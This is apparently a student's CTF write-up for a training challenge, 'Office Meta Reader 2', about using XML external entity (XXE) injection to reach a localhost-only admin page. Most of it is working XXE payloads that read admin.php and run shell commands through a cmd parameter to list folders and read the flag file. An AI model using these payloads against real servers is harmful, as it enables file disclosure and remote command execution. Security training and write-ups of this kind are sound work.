Firebird - Office Meta Reader 2

tags: [[CTF]] [[firebird training]] [[XXE]]

Firebird Homework 9-B Office Meta Reader 2

Bypass 127.0.0.1 Local Access Limit

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/special-http-headers

  1. XXE to make server-side request to admin.php

  2. Rewrite IP source

Attempt 1 failed: Return: <h1>Admin panel only accessible from localhost (127.0.0.1)! Go away hackers</h1> Payload: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://chal.firebird.sh:35043/admin.php"> ]>

Attempt 2 success: Return: Payload: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]>

saw http://localhost can bypass; This is what user can see on admin.php Payload: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:35043/admin.php"> ]>

Try injecting payload: ls successful! Return: Payload: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:35043/admin.php?cmd=ls"> ]>

Find flag in root folder: Payload: (list root folder) <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:35043/admin.php?cmd=ls%20/"> ]> Success! Saw two flag file

Found the Flag!

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:35043/admin.php?cmd=cat%20/flag_2473f16d78231ab2ce2addc4f5fe7dd6"> ]>

PreviousFirebird - M$Office Meta ReaderNextHackTheBox

Last updated